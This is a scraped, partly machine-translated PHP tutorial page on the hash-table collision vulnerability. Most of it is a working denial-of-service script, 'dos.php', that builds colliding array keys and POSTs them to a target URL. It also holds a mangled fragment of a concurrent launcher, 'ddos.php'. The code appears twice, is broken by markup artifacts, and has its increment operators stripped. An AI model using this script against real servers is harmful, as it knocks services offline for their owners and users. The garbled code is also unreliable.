Analysis of PHP's method of using hash conflict vulnerability to carry out DDoS attacks_PHP tutorial

Analysis of how PHP uses hash conflict vulnerabilities to carry out DDoS attacks

This article mainly introduces how PHP uses hash conflict vulnerabilities to carry out DDoS attacks. An example analysis of how PHP uses hash to carry out DDoS attacks. For the principles and implementation techniques of DDoS attacks, friends in need can refer to it

This article provides an example analysis of how PHP uses hash conflict vulnerabilities to carry out DDoS attacks. Share it with everyone for your reference. The specific analysis is as follows:

First of all, a statement: The content of this article is only for research and study use, please do not use it for illegal activities!

As mentioned earlier, the hash table collision vulnerability has recently been exposed. Many common languages ​​including java, python, php, etc. have not been spared. Let’s take a look at its power tonight.

Attack principle:

By posting a set of carefully assembled array parameters to the target server, when the bottom layer of the language processes the received array parameters after reaching the server, the existence of this vulnerability causes a large amount of CPU consumption, eventually leading to the exhaustion of server resources.
No fancy tricks are needed, just use PHP to simply implement it and see the effect, just click on it.

File: dos.php

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

// 目标地址 // 只要目标地址存在，不用管它是干嘛的 $host = 'http://127.0.0.1/test.php'; $data = ''; $size = pow(2, 15); for ($key=0, $max=($size-1)*$size; $key<=$max; $key =$size) { $data .= '&array[' . $key . ']=0'; } $ret = curl($host, ltrim($data,'&')); var_dump($ret); function curl($url, $post, $timeout = 30){ $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:')); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); $output = curl_exec($ch); if ($output === false) return false; $info = curl_getinfo($ch); $http_code = $info['http_code']; if ($http_code == 404) return false; curl_close($ch); return $output; }

1<🎜> <🎜>2<🎜> <🎜>3<🎜> <🎜>4<🎜> <🎜>5<🎜> <🎜>6<🎜> <🎜>7<🎜> <🎜>8<🎜> <🎜>9<🎜> <🎜>10<🎜> <🎜>11<🎜> <🎜>12<🎜> <🎜>13<🎜> <🎜>14<🎜> <🎜>15<🎜> <🎜>16<🎜> <🎜>17<🎜> <🎜>18<🎜> <🎜>19<🎜> <🎜>20<🎜> <🎜>21<🎜> <🎜>22<🎜> <🎜>23<🎜> <🎜>24<🎜> <🎜>25<🎜> <🎜>26<🎜> <🎜>27<🎜> <🎜>28<🎜>

<🎜> <🎜>// Target address<🎜> <🎜>// As long as the target address exists, it doesn’t matter what it is for <🎜> <🎜>$host = 'http://127.0.0.1/test.php';<🎜> <🎜>$data = '';<🎜> <🎜>$size = pow(2, 15);<🎜> <🎜>for ($key=0, $max=($size-1)*$size; $key<=$max; $key =$size)<🎜> <🎜>{<🎜> <🎜>$data .= '&array[' . $key . ']=0';<🎜> <🎜>}<🎜> <🎜>$ret = curl($host, ltrim($data,'&'));<🎜> <🎜>var_dump($ret);<🎜> <🎜>function curl($url, $post, $timeout = 30){<🎜> <🎜>$ch = curl_init();<🎜> <🎜>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<🎜> <🎜>curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);<🎜> <🎜>curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);<🎜> <🎜>curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));<🎜> <🎜>curl_setopt($ch, CURLOPT_URL, $url);<🎜> <🎜>curl_setopt($ch, CURLOPT_POST, true);<🎜> <🎜>curl_setopt($ch, CURLOPT_POSTFIELDS, $post);<🎜> <🎜>$output = curl_exec($ch);<🎜> <🎜>if ($output === false) return false;<🎜> <🎜>$info = curl_getinfo($ch);<🎜> <🎜>$http_code = $info['http_code'];<🎜> <🎜>if ($http_code == 404) return false;<🎜> <🎜>curl_close($ch);<🎜> <🎜>return $output;<🎜> <🎜>}<🎜> <🎜>

文件：ddos.php

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14

for($i=0; $i<5; $i ){//并发数 echo ''; } ?>

1 2

3

4 5

6 7 8 9 10 11 12

13

14

<🎜>for($i=0; $i<5; $i ){//并发数<🎜> <🎜>echo ''; } ?>

希望本文所述对大家的php程序设计有所帮助。 http://www.bkjia.com/PHPjc/974520.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/974520.htmlTechArticlePHP利用hash冲突漏洞进行DDoS攻击的方法分析 这篇文章主要介绍了PHP利用hash冲突漏洞进行DDoS攻击的方法,实例分析了php利用hash进行DDoS攻击的...

Statement：

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn